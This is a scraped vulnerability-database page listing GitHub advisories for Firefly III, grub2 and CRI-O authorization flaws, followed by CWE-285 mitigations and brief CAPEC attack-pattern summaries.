Improper Authorization in GitHub repository firefly-iii/firefly-iii prior to 5.8.0.

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Packagist",
        "name": "grumpydictator/firefly-iii"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "5.8.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2023-0298"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285",
      "CWE-863"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-01-25T22:03:13Z",
    "nvd_published_at": "2023-01-14T08:15:00Z",
    "severity": "MODERATE"
  },
  "details": "Improper Authorization in GitHub repository firefly-iii/firefly-iii prior to 5.8.0.",
  "id": "GHSA-7mc4-jp4f-v2j2",
  "modified": "2023-01-25T22:03:13Z",
  "published": "2023-01-14T09:30:23Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-0298"
    },
    {
      "type": "WEB",
      "url": "https://github.com/firefly-iii/firefly-iii/commit/db0500dcf0d4f1990fc7a377ef0d56c3884fcaa4"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/firefly-iii/firefly-iii"
    },
    {
      "type": "WEB",
      "url": "https://huntr.dev/bounties/9689052c-c1d7-4aae-aa08-346c9b6e04ed"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Improper Authorization in grumpydictator/firefly-iii"
}

GHSA-7P29-8VR2-RMVX

Vulnerability from github – Published: 2022-05-24 17:43 – Updated: 2022-05-24 17:43
VLAI
Details

A flaw was found in grub2 in versions prior to 2.06. The cutmem command does not honor secure boot locking allowing an privileged attacker to remove address ranges from memory creating an opportunity to circumvent SecureBoot protections after proper triage about grub's memory layout. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2020-27779"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2021-03-03T17:15:00Z",
    "severity": "HIGH"
  },
  "details": "A flaw was found in grub2 in versions prior to 2.06. The cutmem command does not honor secure boot locking allowing an privileged attacker to remove address ranges from memory creating an opportunity to circumvent SecureBoot protections after proper triage about grub\u0027s memory layout. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability.",
  "id": "GHSA-7p29-8vr2-rmvx",
  "modified": "2022-05-24T17:43:31Z",
  "published": "2022-05-24T17:43:31Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27779"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1900698"
    },
    {
      "type": "WEB",
      "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZWZ36QK4IKU6MWDWNOOWKPH3WXZBHT2R"
    },
    {
      "type": "WEB",
      "url": "https://security.gentoo.org/glsa/202104-05"
    },
    {
      "type": "WEB",
      "url": "https://security.netapp.com/advisory/ntap-20220325-0001"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

GHSA-7P9F-6X8J-GXXP

Vulnerability from github – Published: 2024-11-26 21:50 – Updated: 2025-07-02 14:27
VLAI
Summary
CRI-O: Maliciously structured checkpoint file can gain arbitrary node access
Details

Impact

Patches

1.31.1, 1.30.6, 1.29.8

Workarounds

set enable_criu_support = false

References

Are there any links users can visit to find out more?

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/cri-o/cri-o"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.29.11"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/cri-o/cri-o"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.30.0"
            },
            {
              "fixed": "1.30.8"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/cri-o/cri-o"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "1.31.0"
            },
            {
              "fixed": "1.31.3"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-8676"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-285"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-11-26T21:50:30Z",
    "nvd_published_at": "2024-11-26T20:15:34Z",
    "severity": "MODERATE"
  },
  "details": "### Impact\n\n### Patches\n1.31.1, 1.30.6, 1.29.8\n\n### Workarounds\nset `enable_criu_support = false` \n\n### References\n_Are there any links users can visit to find out more?_",
  "id": "GHSA-7p9f-6x8j-gxxp",
  "modified": "2025-07-02T14:27:58Z",
  "published": "2024-11-26T21:50:30Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/cri-o/cri-o/security/advisories/GHSA-7p9f-6x8j-gxxp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-8676"
    },
    {
      "type": "WEB",
      "url": "https://github.com/cri-o/cri-o/commit/e8e7dcb7838d11b5157976bf3e31a5840bb77de7"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHBA-2024:10826"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:0648"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:1908"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:3297"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:4211"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/errata/RHSA-2025:9765"
    },
    {
      "type": "WEB",
      "url": "https://access.redhat.com/security/cve/CVE-2024-8676"
    },
    {
      "type": "WEB",
      "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2313842"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/cri-o/cri-o"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    },
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U",
      "type": "CVSS_V4"
    }
  ],
  "summary": "CRI-O: Maliciously structured checkpoint file can gain arbitrary node access"
}

Mitigation
Architecture and Design
  • Divide the product into anonymous, normal, privileged, and administrative areas. Reduce the attack surface by carefully mapping roles with data and functionality. Use role-based access control (RBAC) to enforce the roles at the appropriate boundaries.
  • Note that this approach may not protect against horizontal authorization, i.e., it will not protect a user from attacking others with the same role.
Mitigation
Architecture and Design

Ensure that you perform access control checks related to your business logic. These checks may be different than the access control checks that you apply to more generic resources such as files, connections, processes, memory, and database records. For example, a database may restrict access for medical records to a specific database user, but each record might only be intended to be accessible to the patient and the patient's doctor.

Mitigation MIT-4.4
Architecture and Design

Strategy: Libraries or Frameworks

  • Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.
  • For example, consider using authorization frameworks such as the JAAS Authorization Framework [REF-233] and the OWASP ESAPI Access Control feature [REF-45].
Mitigation
Architecture and Design
  • For web applications, make sure that the access control mechanism is enforced correctly at the server side on every page. Users should not be able to access any unauthorized functionality or information by simply requesting direct access to that page.
  • One way to do this is to ensure that all pages containing sensitive information are not cached, and that all such pages restrict access to requests that are accompanied by an active and authenticated session token associated with a user who has the required permissions to access that page.
Mitigation
System Configuration Installation

Use the access control capabilities of your operating system and server environment and define your access control lists accordingly. Use a "default deny" policy when defining these ACLs.

CAPEC-1: Accessing Functionality Not Properly Constrained by ACLs

In applications, particularly web applications, access to functionality is mitigated by an authorization framework. This framework maps Access Control Lists (ACLs) to elements of the application's functionality; particularly URL's for web apps. In the case that the administrator failed to specify an ACL for a particular element, an attacker may be able to access it with impunity. An attacker with the ability to access functionality not properly constrained by ACLs can obtain sensitive information and possibly compromise the entire application. Such an attacker can access resources that must be available only to users at a higher privilege level, can access management sections of the application, or can run queries for data that they otherwise not supposed to.

CAPEC-104: Cross Zone Scripting

An attacker is able to cause a victim to load content into their web-browser that bypasses security zone controls and gain access to increased privileges to execute scripting code or other web objects such as unsigned ActiveX controls or applets. This is a privilege elevation attack targeted at zone-based web-browser security.

CAPEC-127: Directory Indexing

An adversary crafts a request to a target that results in the target listing/indexing the content of a directory as output. One common method of triggering directory contents as output is to construct a request containing a path that terminates in a directory name rather than a file name since many applications are configured to provide a list of the directory's contents when such a request is received. An adversary can use this to explore the directory tree on a target as well as learn the names of files. This can often end up revealing test files, backup files, temporary files, hidden files, configuration files, user accounts, script contents, as well as naming conventions, all of which can be used by an attacker to mount additional attacks.

CAPEC-13: Subverting Environment Variable Values

The adversary directly or indirectly modifies environment variables used by or controlling the target software. The adversary's goal is to cause the target software to deviate from its expected operation in a manner that benefits the adversary.

CAPEC-17: Using Malicious Files

An attack of this type exploits a system's configuration that allows an adversary to either directly access an executable file, for example through shell access; or in a possible worst case allows an adversary to upload a file and then execute it. Web servers, ftp servers, and message oriented middleware systems which have many integration points are particularly vulnerable, because both the programmers and the administrators must be in synch regarding the interfaces and the correct privileges for each interface.

CAPEC-39: Manipulating Opaque Client-based Data Tokens

In circumstances where an application holds important data client-side in tokens (cookies, URLs, data files, and so forth) that data can be manipulated. If client or server-side application components reinterpret that data as authentication tokens or data (such as store item pricing or wallet information) then even opaquely manipulating that data may bear fruit for an Attacker. In this pattern an attacker undermines the assumption that client side tokens have been adequately protected from tampering through use of encryption or obfuscation.

CAPEC-402: Bypassing ATA Password Security

An adversary exploits a weakness in ATA security on a drive to gain access to the information the drive contains without supplying the proper credentials. ATA Security is often employed to protect hard disk information from unauthorized access. The mechanism requires the user to type in a password before the BIOS is allowed access to drive contents. Some implementations of ATA security will accept the ATA command to update the password without the user having authenticated with the BIOS. This occurs because the security mechanism assumes the user has first authenticated via the BIOS prior to sending commands to the drive. Various methods exist for exploiting this flaw, the most common being installing the ATA protected drive into a system lacking ATA security features (a.k.a. hot swapping). Once the drive is installed into the new system the BIOS can be used to reset the drive password.

CAPEC-45: Buffer Overflow via Symbolic Links

This type of attack leverages the use of symbolic links to cause buffer overflows. An adversary can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.

CAPEC-5: Blue Boxing

This type of attack against older telephone switches and trunks has been around for decades. A tone is sent by an adversary to impersonate a supervisor signal which has the effect of rerouting or usurping command of the line. While the US infrastructure proper may not contain widespread vulnerabilities to this type of attack, many companies are connected globally through call centers and business process outsourcing. These international systems may be operated in countries which have not upgraded Telco infrastructure and so are vulnerable to Blue boxing. Blue boxing is a result of failure on the part of the system to enforce strong authorization for administrative functions. While the infrastructure is different than standard current applications like web applications, there are historical lessons to be learned to upgrade the access control for administrative functions.

{'xhtml:b': 'This attack pattern is included in CAPEC for historical purposes.'}

CAPEC-51: Poison Web Service Registry

SOA and Web Services often use a registry to perform look up, get schema information, and metadata about services. A poisoned registry can redirect (think phishing for servers) the service requester to a malicious service provider, provide incorrect information in schema or metadata, and delete information about service provider interfaces.

CAPEC-59: Session Credential Falsification through Prediction

This attack targets predictable session ID in order to gain privileges. The attacker can predict the session ID used during a transaction to perform spoofing and session hijacking.

CAPEC-60: Reusing Session IDs (aka Session Replay)

This attack targets the reuse of valid session ID to spoof the target system in order to gain privileges. The attacker tries to reuse a stolen session ID used previously during a transaction to perform spoofing and session hijacking. Another name for this type of attack is Session Replay.

CAPEC-647: Collect Data from Registries

An adversary exploits a weakness in authorization to gather system-specific data and sensitive information within a registry (e.g., Windows Registry, Mac plist). These contain information about the system configuration, software, operating system, and security. The adversary can leverage information gathered in order to carry out further attacks.

CAPEC-668: Key Negotiation of Bluetooth Attack (KNOB)

An adversary can exploit a flaw in Bluetooth key negotiation allowing them to decrypt information sent between two devices communicating via Bluetooth. The adversary uses an Adversary in the Middle setup to modify packets sent between the two devices during the authentication process, specifically the entropy bits. Knowledge of the number of entropy bits will allow the attacker to easily decrypt information passing over the line of communication.

CAPEC-76: Manipulating Web Input to File System Calls

An attacker manipulates inputs to the target software which the target software passes to file system calls in the OS. The goal is to gain access to, and perhaps modify, areas of the file system that the target software did not intend to be accessible.

CAPEC-77: Manipulating User-Controlled Variables

This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.

CAPEC-87: Forceful Browsing

An attacker employs forceful browsing (direct URL entry) to access portions of a website that are otherwise unreachable. Usually, a front controller or similar design pattern is employed to protect access to portions of a web application. Forceful browsing enables an attacker to access information, perform privileged operations and otherwise reach sections of the web application that have been improperly protected.